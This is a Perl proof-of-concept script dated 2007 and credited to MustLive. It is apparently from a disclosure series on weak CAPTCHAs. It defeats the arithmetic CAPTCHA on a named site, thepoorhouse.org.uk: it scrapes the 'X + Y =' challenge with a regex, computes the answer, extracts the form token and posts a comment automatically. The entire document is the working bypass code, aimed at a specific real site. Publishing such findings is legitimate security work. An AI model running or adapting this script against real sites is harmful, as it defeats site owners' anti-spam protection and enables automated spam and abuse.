#!/usr/bin/perl
# MoBiC-24: thepoorhouse.org.uk CAPTCHA bypass
# Content analysis CAPTCHA bypass method
# Made by MustLive
# http://websecurity.com.ua
# 29.10.2007
use LWP::UserAgent;
use HTTP::Cookies;

my $agent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414";
my $page_url = "http://www.thepoorhouse.org.uk/implementing_captcha_spam_protection_in_php";
my $url = "http://www.thepoorhouse.org.uk/comment/reply/1010";

my $ua = LWP::UserAgent->new;
$ua->agent($agent);
$ua->cookie_jar(HTTP::Cookies->new(file => "thepoorhouse.org.uk CAPTCHA bypass_cookies.txt",autosave => 1));

print "Content-type:text/html\n\n";
my ($captcha_token,$captcha_code) = &GetData;
&BypassCaptcha if ($captcha_token && $captcha_code);
exit;

sub GetData() {
	my $res = $ua->get($page_url);

	if ($res->is_success) {
		$res->content =~ /<span class="field-prefix">(\d+) \+ (\d+) =/;
		my $code = $1 + $2;
		$res->content =~ /id="edit-captcha-token" value="(.+?)"/;
		return ($1,$code);
	}
	else {
		print "Error: " . $res->status_line;
		return 0;
	}
}

sub BypassCaptcha() {
	my %fields = (
	'name' => 'Test',
	'mail' => 'test@test.test',
	'homepage' => 'http://websecurity.com.ua',
	'comment' => 'Captcha bypass test.',
	'form_id' => 'comment_form',
	'captcha_response' => $captcha_code,
	'captcha_token' => $captcha_token,
	'op' => 'Post comment'
	);
	my $res = $ua->post($url,[%fields]);

	if ($res->status_line =~ "^302") {
		$res = $ua->get($page_url);
		if ($res->is_success) {
			print $res->content;
		}
		else {
			print "Error: " . $res->status_line;
		}
	}
	else {
		print "Error: " . $res->status_line;
	}
}